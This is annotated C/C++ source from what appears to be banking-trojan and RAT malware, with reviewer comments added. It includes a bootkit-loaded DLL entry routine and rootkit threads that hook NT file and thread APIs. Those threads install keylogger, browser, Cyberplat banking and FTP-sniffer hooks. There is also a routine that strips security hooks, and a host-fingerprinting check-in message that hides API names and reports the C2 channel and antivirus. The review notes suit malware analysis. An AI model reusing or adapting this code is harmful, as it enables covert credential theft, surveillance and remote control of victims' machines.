// Loader-DLL entry routine, run once the DLL is inside a target process.
// Original author's note (reworded for clarity): when the DLL is brought in
// by the bootkit driver rather than by the normal Windows loader,
// DllMain(_, DLL_PROCESS_ATTACH, _) is not run in the usual way, so the code
// waits a fixed timeout to let the process finish loading its modules in the
// default load order; only then does it resolve APIs ("GetApi") for its own use.
//
// Arguments - opaque thread argument; never read by this function.
// Behaviour: sleeps 5 s, logs, checks the "loaded by bootkit" flag, and then
// starts per-process worker threads selected by a hash of the host EXE name.
// NOTE(review): every helper used here (pSleep, LDRDBG, DebugReportInit,
// File::ExtractFileNameA, STR::GetHash, IsDllLoadedByBootkitLoader,
// StartThread and the thread procedures) is defined elsewhere; nothing on
// this page shows what the worker threads do.
void StartBootkitDll(void* Arguments)
{
    // Fixed 5000 ms delay before any activity (a stable timing artefact
    // worth noting for detection/sandbox tuning).
    DWORD timeout = 5 * 1000;
    LDRDBG("StartBootkitDll", "Sleeping %d ms.", timeout);
    pSleep(timeout);
    LDRDBG("StartBootkitDll", "Waking up after %d ms.", timeout);

    DebugReportInit();

    // Determine which process we are in: full path of the host executable,
    // then its file-name part, then a hash of that name (the `true` third
    // argument of STR::GetHash presumably means case-insensitive — confirm).
    char Name[MAX_PATH];
    // NOTE(review): only the zero return is handled; a truncated path
    // (ERROR_INSUFFICIENT_BUFFER) is not detected and Name is still used
    // as a C string below.
    if ((DWORD)pGetModuleFileNameA(NULL, Name, MAX_PATH) == 0)
        return;
    PCHAR ShortName = File::ExtractFileNameA(Name, false);
    DWORD Hash = STR::GetHash(ShortName, 0, true);

    LDRDBG("StartBootkitDll", "LoaderDll loaded in path='%s' pid=%u...", Name, (DWORD)pGetProcessId() );

    // NOTE(review): IsDllLoadedByBootkitLoader() is evaluated twice — once
    // for the log line and once for the decision. If it has side effects or
    // can change between the two calls, the log and the branch may disagree.
    LDRDBG("StartBootkitDll", "LoaderDll wake up and check IsLoadedByOriginalBootkit=%d", IsDllLoadedByBootkitLoader());
    if (!IsDllLoadedByBootkitLoader())
    {
        LDRDBG("StartBootkitDll", "LoaderDll is NOT loaded by Bootkit loader. Finished.");
        return;
    }
    LDRDBG("StartBootkitDll", "LoaderDll detects original bootkit loading.");

    // Host-process selection is by pre-computed name hash; the two constants
    // are labelled by the original author as svchost.exe and explorer.exe
    // (the labels are not verifiable from this page).
    if (Hash == 0x2608DF01 /* svchost.exe */)
    {
        LDRDBG("StartBootkitDll", "LoaderDll loaded in SVCHOST. ");
        StartThread(DbgRptSvchostThread, NULL);
    }
    if (Hash == 0x490A0972 /* explorer.exe */)
    {
        LDRDBG("StartBootkitDll", "LoaderDll loaded in EXPLORER. ");
        StartThread(DbgRptExplorerThread, NULL);
        LDRDBG("StartBootkitDll", "Starting loading and run plug.");
        // Second thread in explorer: loads and runs the bot plug-in.
        StartThread(ExplorerLoadAndRunBotPlug, NULL);
    }
    LDRDBG("StartBootkitDll", "finished.");
}
// Callback the driver invokes in a newly started user-mode process.
// It records which process this is (by hashed EXE name) and hands the
// driver's notify block to the appropriate worker thread.
//
// NormalContext   - "system pointer" (original comment); not used here.
// SystemArgument1 - PUSER_INIT_NOTIFY; original comment says it must be kept
//                   to communicate with the driver. Passed on to the threads.
// SystemArgument2 - "nothing is passed" (original comment); unused.
// Returns nothing. All helpers are defined elsewhere (see loader DLL above).
VOID WINAPI Start(
    PVOID NormalContext            /* system pointer (original comment) */,
    PUSER_INIT_NOTIFY SystemArgument1 /* must be kept to talk to the driver (original comment) */,
    PVOID SystemArgument2          /* nothing is passed here (original comment) */
    )
{
    // NOTE(review): the flag is reset before SystemArgument1 is validated,
    // so a NULL notify block still clears the flag before the early return.
    // Whether that ordering is intentional cannot be told from this page.
    ResetBootkitLoaderFlag();

    // Start the DLL-loading thread (original comment) — only if the driver
    // actually supplied a notify block.
    if (SystemArgument1 == NULL)
        return;

    // Determine which process we are in (path -> file name -> name hash).
    char Name[MAX_PATH];
    if ((DWORD)pGetModuleFileNameA(NULL, Name, MAX_PATH) == 0)
        return;
    PCHAR ShortName = File::ExtractFileNameA(Name, false);
    DWORD Hash = STR::GetHash(ShortName, 0, true);

    LDRDBG("BRDS", "LoaderDll loaded ...");

    //// 301_ld: startup in general (there may be no network at this point)
    //PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("301_ld"));

    // Hash constants labelled by the original author as svchost.exe / explorer.exe.
    if (Hash == 0x2608DF01 /* svchost.exe */)
    {
        PCHAR CL = (PCHAR)pGetCommandLineA();
        // Log text (Russian): "driver intercepted start of svchost.exe",
        // "svchost.exe command line - %s". The literals are left untouched.
        LDRDBG("BRDS", "Драйвер перехватил запуск процесса svchost.exe ");
        LDRDBG("BRDS", "Командная строка svchost.exe - %s ", CL);
        // NOTE(review): the "localservice" command-line filter is commented
        // out, so the loader thread is started in EVERY svchost.exe instance;
        // the bare braces below are what remains of that `if`.
        //if (STR::Pos(CL, "localservice", 0, false) >= 0)
        {
            DLLLoader::StartLoaderThread(SystemArgument1);
        }
    }

    if (Hash == 0x490A0972 /* explorer.exe */)
    {
        // LDRDBG("BRDS", "Драйвер перехватил запуск эксплорера ");
        StartThread(ExplorerStartProc, SystemArgument1);
    }
}; // NOTE(review): stray ';' after the function body (harmless, lint-worthy).
// Thread body executed inside a process this module has been injected into
// ("the thread runs in the injected process" — original comment).
// This is variant A of RootkitThread; a second variant with a different
// hook set appears further down this page, presumably from another build
// configuration — only one can be linked into a given binary.
//
// lpData - thread argument; never read.
// Returns 0 on every path.
DWORD WINAPI RootkitThread( LPVOID lpData )
{
    // Kept in the original order: foreign hooks in loaded DLLs are removed
    // first, then this module's own hooks on ZwResumeThread and
    // ZwQueryDirectoryFile are installed. Presumably the unhook must precede
    // the hook installation — what UnhookDlls touches is defined elsewhere.
    UnhookDlls();
    HookZwResumeThread();
    HookZwQueryDirectoryFile();

    // Prepare the event data (original comment).
    TEventData Data;
    ClearStruct(Data);

    // Determine the application name: full path of the host executable is
    // copied into a MAX_PATH buffer owned by this thread.
    PCHAR AppName = STR::Alloc(MAX_PATH);
    if (AppName != NULL && pGetModuleFileNameA(NULL, AppName, MAX_PATH))
        Data.Application = AppName;

    // Hook installed when iBank / Cyberplat starts, for both the .exe and the
    // web variant (original comment). In this variant both calls are
    // commented out, so the RuBnkH block is a no-op.
#ifdef RuBnkH
    // if (IbankHooksMain() ) return 0;
    //if (HookCyberplatPCMain()) return 0;
#endif

    // NOTE(review): this early return leaks AppName — STR::Free is only
    // reached on the fall-through path below.
    if ( IsTrade() )
    {
        return 0;
    }

    ApplicationStarted(&Data);
    STR::Free(AppName);
    return 0;
}
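// Restores the first bytes of every named export of hModule from a fresh
// mapping of the same module file, undoing inline hooks that other code
// placed on those exports (from a defender's point of view: this is how the
// injected code strips third-party API hooks in its host process).
// Two kinds of hook are deliberately left in place: the export named
// "InternetGetCookieExA", and any E9 (JMP rel32) hook whose target resolves
// into ieframe.dll.
//
// hModule - base address of a module already loaded in the current process.
// Returns nothing; all failures are silent (the DbgPrint calls are commented out).
//
// NOTE(review): the listing this was recovered from was one closing brace
// short. The function has been re-closed with UnmapViewOfFile at the
// `if (pMap)` level so the mapping is released even when pRtlImageNtHeader
// returns NULL; every other token is as in the original.
// NOTE(review): the (DWORD) pointer arithmetic makes this 32-bit only.
VOID UnhookModuleExports(HMODULE hModule)
{
    CHAR szModuleFileName[MAX_PATH];
    // NOTE(review): return value not checked — on failure szModuleFileName
    // is indeterminate and is still handed to MapBinary.
    pGetModuleFileNameA(hModule,szModuleFileName,sizeof(szModuleFileName));
    // Clean reference copy of the module. The loop below indexes pMap with
    // RVAs, so MapBinary is presumed to produce an image-layout mapping;
    // its definition is not on this page.
    PVOID pMap = MapBinary(szModuleFileName);
    if (pMap)
    {
        PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)pRtlImageNtHeader(hModule);
        if (pNtHeaders)
        {
            DWORD dwExportsSize;
            //PIMAGE_NT_HEADERS pnt = (PIMAGE_NT_HEADERS)(PIMAGE_DOS_HEADER(hModule)->e_lfanew +(PCHAR)hModule);
            // dwExportsSize = pnt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;
            /*PIMAGE_EXPORT_DIRECTORY(PCHAR(hModule) + pnt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);//*/
            PIMAGE_EXPORT_DIRECTORY ExportDirectory =(PIMAGE_EXPORT_DIRECTORY)pRtlImageDirectoryEntryToData((PVOID)hModule,TRUE,IMAGE_DIRECTORY_ENTRY_EXPORT,&dwExportsSize);
            if (ExportDirectory && dwExportsSize)
            {
                // Export tables of the live module. Ords[] is parallel to
                // Names[] and maps a name index to a slot in EntriesRva[].
                PUSHORT Ords = (PUSHORT)((DWORD)hModule+ExportDirectory->AddressOfNameOrdinals);
                PULONG EntriesRva = (PULONG)((DWORD)hModule+ExportDirectory->AddressOfFunctions);
                PULONG Names = (PULONG)((DWORD)hModule+ExportDirectory->AddressOfNames);
                // Only named exports are visited; ordinal-only exports are not examined.
                for (ULONG cEntry = 0; cEntry < ExportDirectory->NumberOfNames; cEntry++)
                {
                    // Only the first 10 bytes of each export are compared and
                    // restored; a hook placed deeper in the function is not seen.
                    ULONG StartSize = 10;
                    PVOID ApiStart = (PVOID)((DWORD)hModule+EntriesRva[Ords[cEntry]]);
                    PVOID ApiOriginalStart = (PVOID)((DWORD)pMap+EntriesRva[Ords[cEntry]]);
                    // Assuming memcmp semantics for m_memcmp: non-zero means the
                    // live bytes differ from the reference copy.
                    if (m_memcmp(ApiStart,ApiOriginalStart,StartSize))
                    {
                        BOOL bRestore = TRUE;
                        // DbgPrint("Hook found %s - %08x - %s ...",szModuleFileName,ApiStart,((DWORD_PTR)hModule+Names[cEntry]));
                        // Exception 1: this export is never restored.
                        if (!plstrcmpA((PCHAR)((DWORD_PTR)hModule+Names[cEntry]),"InternetGetCookieExA"))
                        {
                            bRestore = FALSE;
                        }
                        // Exception 2: E9 = JMP rel32. Resolve the jump target and
                        // skip the restore if the target lies in ieframe.dll.
                        if (*(BYTE*)ApiStart == 0xE9)
                        {
                            PVOID Handler = (PVOID)(*(DWORD*)((DWORD)ApiStart + 1) + (DWORD)ApiStart + 5);
                            CHAR FileName[MAX_PATH];
                            if (pGetMappedFileNameA(pGetCurrentProcess(),Handler,FileName,RTL_NUMBER_OF(FileName)-1))
                            {
                                if (!plstrcmpA(pPathFindFileNameA(FileName),"ieframe.dll"))
                                {
                                    // DbgPrint("Not restored.\n");
                                    bRestore = FALSE;
                                }
                            }
                        }
                        if (bRestore)
                        {
                            ULONG Written;
                            // WriteProcessMemory on the current process rather than a
                            // plain memcpy — presumably so the write succeeds on
                            // read-only code pages; confirm against the helper's setup.
                            if (pWriteProcessMemory(pGetCurrentProcess(),ApiStart,ApiOriginalStart,StartSize,&Written))
                            {
                                // DbgPrint("Restored.\n");
                            }
                            else
                            {
                                // DbgPrint(__FUNCTION__"(): WriteProcessMemory failed with error %lx\n",GetLastError());
                            }
                        }
                    }
                }
            }
        }
        // Reconstructed placement (see note above). NOTE(review): this is the
        // only Win32 call in the function not routed through a p-prefixed
        // resolved pointer — inconsistent with the file's API-resolution style.
        UnmapViewOfFile(pMap);
    }
}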
// Thread body executed inside a process this module has been injected into
// ("the thread runs in the injected process" — original comment).
// This is variant B of RootkitThread (variant A appears earlier on this page);
// the two differ in which hooks are compiled in and which early exits are
// live, and only one can be linked into a given binary.
//
// Feature blocks are gated on macros that look like include guards
// (__keylogger_h__, __java_h__, ...), i.e. a hook is compiled in when its
// header was included — presumably; the build configuration is not on this page.
//
// lpData - thread argument; never read.
// Returns 0 on every path.
DWORD WINAPI RootkitThread( LPVOID lpData )
{
    // Kept in the original order: foreign hooks are removed first, then this
    // module's own ZwResumeThread / ZwQueryDirectoryFile hooks are installed.
    UnhookDlls();
    HookZwResumeThread();
    HookZwQueryDirectoryFile();

    // Prepare the event data (original comment).
    TEventData Data;
    ClearStruct(Data);

    // Determine the application name: full path of the host executable.
    PCHAR AppName = STR::Alloc(MAX_PATH);
    if (AppName != NULL && pGetModuleFileNameA(NULL, AppName, MAX_PATH))
        Data.Application = AppName;

    // HANDLE Thread = pGetCurrentThread();
    // DWORD H = GetPidByThread(Thread);

#ifdef __keylogger_h__
    HookKeyLogger();
#endif

#ifdef __java_h__
    HookJava();
#endif

#ifdef __opera_h__
    // NOTE(review): returns without STR::Free(AppName) — leak on this path.
    if ( HookOpera() )
    {
        return 0;
    }
#endif

#ifdef InternetExplorerH
    // Browser paths fire two events and release AppName before returning.
    if ( HookInternetExplorer() )
    {
        InternetExplorerStarted(&Data);
        BrowserStarted(&Data);
        STR::Free(AppName);
        return 0;
    }
#endif

#ifdef FireFoxH
    if ( HookMozillaFirefox() )
    {
        FireFoxStarted(&Data);
        BrowserStarted(&Data);
        STR::Free(AppName);
        return 0;
    }
#endif

    // Load the DLL that allows remote monitoring of the desktop (original comment).
    // NOTE(review): returns without STR::Free(AppName) — leak on this path.
#ifdef PokerH
    if (IsPoker()) return 0;
#endif

    // Hook installed when iBank / Cyberplat starts, for both the .exe and the
    // web variant (original comment). Unlike variant A, HookCyberplatPCMain
    // is live here while IsTrade (below) is commented out.
    // NOTE(review): returns without STR::Free(AppName) — leak on this path.
#ifdef RuBnkH
    // if (IbankHooksMain() ) return 0;
    if (HookCyberplatPCMain()) return 0;
#endif

    /*if ( IsTrade() ) { return 0; }*/

    // Fall-through path for any other host process.
    FtpSniffer();
    ApplicationStarted(&Data);
    STR::Free(AppName);
    return 0;
}
// Builds a TOKEN_SYSTEMINFO check-in message (MESSAGEInfo) describing the
// host — CPU speed and name, computer and user name, screen size, the
// check-in channel and port, this program's path, its install mode and the
// detected antivirus — and sends the whole struct with Send().
//
// Style notes for analysts: several API names and the registry path are
// assembled on the stack from per-character initializers (JYvni02, HrFvD07,
// ...) and resolved through GetProcAddress, which keeps them out of the
// binary's string table; the obfuscation is inconsistent (see notes below).
// Everything referenced but not defined here — MESSAGEInfo, the *T function
// pointer typedefs, GetCurrentUserNamet, nConnect, lpConnects, dwPort,
// Installope, GetVirus, Send — lives elsewhere in the project.
void CSystemManager::GetSystemInfo()
{
    // NOTE(review): Infomsg is not cleared here. If MESSAGEInfo is a plain
    // struct without a zeroing constructor, any field not written below goes
    // out over Send() with leftover stack contents.
    MESSAGEInfo Infomsg;
    // Collect OS-related information (original comment).
    Infomsg.bToken = TOKEN_SYSTEMINFO;

    //////////////CPU Speed/////////////////
    DWORD dwCpu, dwBufLen;
    HKEY hKey;
    // "HARDWARE\DESCRIPTION\System\CentralProcessor\0", built char by char.
    char JYvni02[] = {'H','A','R','D','W','A','R','E','\\','D','E','S','C','R','I','P','T','I','O','N','\\','S','y','s','t','e','m','\\','C','e','n','t','r','a','l','P','r','o','c','e','s','s','o','r','\\','0','\0'};
    // "RegOpenKeyExA"
    char HrFvD07[] = {'R','e','g','O','p','e','n','K','e','y','E','x','A','\0'};
    // NOTE(review): LoadLibrary("ADVAPI32.dll") is called three times in this
    // function and never paired with FreeLibrary; harmless for an already
    // loaded system DLL, but each call bumps its reference count.
    RegOpenKeyExAT pRegOpenKeyExA=(RegOpenKeyExAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),HrFvD07);
    // NOTE(review): return value ignored. If the open fails, hKey is
    // indeterminate and is still passed to RegQueryValueExA / RegCloseKey,
    // and dwCpu stays uninitialized for the wsprintf below.
    pRegOpenKeyExA( HKEY_LOCAL_MACHINE, JYvni02, 0, KEY_QUERY_VALUE, &hKey );
    dwBufLen = sizeof(DWORD);
    // "RegQueryValueExA" — NOTE(review): built but never used; the plaintext
    // literal is passed to GetProcAddress on the next line instead.
    char HrFvD13[] = {'R','e','g','Q','u','e','r','y','V','a','l','u','e','E','x','A','\0'};
    RegQueryValueExAT pRegQueryValueExA=(RegQueryValueExAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"RegQueryValueExA");
    pRegQueryValueExA( hKey, ("~MHz"), NULL, NULL,(LPBYTE)&dwCpu, &dwBufLen);
    // "RegCloseKey"
    char HrFvD06[] = {'R','e','g','C','l','o','s','e','K','e','y','\0'};
    RegCloseKeyT pRegCloseKey=(RegCloseKeyT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),HrFvD06);
    pRegCloseKey(hKey);
    // "wsprintfA" — reused for every formatted field below. NOTE(review):
    // wsprintfA has no destination bound; field sizes of MESSAGEInfo are not
    // visible here, so overflow cannot be ruled out for long inputs.
    char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'};
    wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50);
    pwsprintfA(Infomsg.szCpuSpeend,("~%u MHz"), dwCpu);

    //Get CPU Info===============================
    // Same registry path as JYvni02, with a second terminating '\0'.
    CHAR SubKey[] = {'H','A','R','D','W','A','R','E','\\','D','E','S','C','R','I','P','T','I','O','N','\\','S','y','s','t','e','m','\\','C','e','n','t','r','a','l','P','r','o','c','e','s','s','o','r','\\','0','\0','\0'};
    // CHAR SubKey[MAX_PATH]=("HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\0");
    hKey = NULL;
    // NOTE(review): opened with KEY_ALL_ACCESS although only a read follows;
    // presumably fails for non-elevated callers, leaving szCpuInfo unset.
    if(pRegOpenKeyExA(HKEY_LOCAL_MACHINE,SubKey,0L,KEY_ALL_ACCESS,&hKey) == ERROR_SUCCESS)
    {
        DWORD dwType;
        // Assumes szCpuInfo holds at least 128 TCHARs — not verifiable here.
        DWORD dwSize = 128 * sizeof(TCHAR);
        pRegQueryValueExA(hKey,("ProcessorNameString"),NULL,&dwType,(BYTE *)Infomsg.szCpuInfo,&dwSize);
        pRegCloseKey(hKey);
    }

    //Get Computer & User Name========================
    DWORD dwLen = sizeof(Infomsg.szPcName);
    // "GetComputerNameA"
    char CPolQ16[] = {'G','e','t','C','o','m','p','u','t','e','r','N','a','m','e','A','\0'};
    GetComputerNameAT pGetComputerNameA=(GetComputerNameAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),CPolQ16);
    pGetComputerNameA(Infomsg.szPcName, &dwLen);
    /* dwLen = sizeof(Infomsg.szUserName); GetUserName(Infomsg.szUserName,&dwLen); // get current user name */
    // Get the current user name and computer name (original comment);
    // GetCurrentUserNamet is a project helper not shown here.
    GetCurrentUserNamet(Infomsg.szUserName);

    //Get Screen Size=================================
    // "GetSystemMetrics"
    char DYrEN67[] = {'G','e','t','S','y','s','t','e','m','M','e','t','r','i','c','s','\0'};
    GetSystemMetricsT pGetSystemMetrics=(GetSystemMetricsT)GetProcAddress(LoadLibrary("USER32.dll"),DYrEN67);
    pwsprintfA(Infomsg.szScrSize, ("%d * %d"), pGetSystemMetrics(SM_CXSCREEN),pGetSystemMetrics(SM_CYSCREEN));

    // Check-in ("上线") channel description: nConnect selects one of three
    // configured rendezvous strings — 0: domain name, 1: QQ, 2: net-disk
    // ("网盘") — and the matching port. The literals are left untouched.
    // UINT Porst =dwPort[nConnect];
    if(nConnect==0) pwsprintfA(Infomsg.LineName,"域名上线:%s",lpConnects[0]);   // write domain check-in
    if(nConnect==1) pwsprintfA(Infomsg.LineName,"QQ上线:%s",lpConnects[1]);     // write QQ check-in
    if(nConnect==2) pwsprintfA(Infomsg.LineName,"网盘上线:%s",lpConnects[2]);   // write net-disk check-in
    // NOTE(review): LineName is left unwritten for any other nConnect value.
    pwsprintfA(Infomsg.LinePort,"%d",dwPort[nConnect]);                         // write check-in port

    // "GetModuleFileNameA"
    char LCoHX03[] = {'G','e','t','M','o','d','u','l','e','F','i','l','e','N','a','m','e','A','\0'};
    GetModuleFileNameAT pGetModuleFileNameA=(GetModuleFileNameAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),LCoHX03);
    // NOTE(review): szbuf is 256 bytes but the call is told it has MAX_PATH
    // (260) — a path longer than 255 characters overruns the stack buffer.
    char szbuf[256];
    pGetModuleFileNameA(NULL,szbuf,MAX_PATH);   // get this program's own path (original comment)
    pwsprintfA(Infomsg.Program,"%s",szbuf );

    // Install / run mode reported to the controller (Installope is set elsewhere).
    // Literal glosses: "(portable run) -- no check-in after reboot!",
    // "(service start) -- runs as the SYSTEM user!", "(direct start) -- runs as current user!".
    if(Installope==0)   // portable, one-shot run (original comment)
    {
        pwsprintfA(Infomsg.InstallOpen,"%s","(绿色运行)--重启不上线!");   // check-in run mode
    }
    else if(Installope==1)   // started as a service (original comment)
    {
        pwsprintfA(Infomsg.InstallOpen,"%s","(服务启动)--SYSTEM用户运行!");   // check-in run mode
    }
    else if(Installope==2)   // started directly (original comment)
    {
        pwsprintfA(Infomsg.InstallOpen,"%s","(直接启动)--当前用户运行!");   // check-in run mode
    }
    // Antivirus software (original comment); GetVirus() is defined elsewhere.
    pwsprintfA(Infomsg.szUserVirus,"%s",GetVirus());
    // Whole struct is sent as-is, including any fields left unwritten above.
    Send((LPBYTE)&Infomsg, sizeof(MESSAGEInfo));
}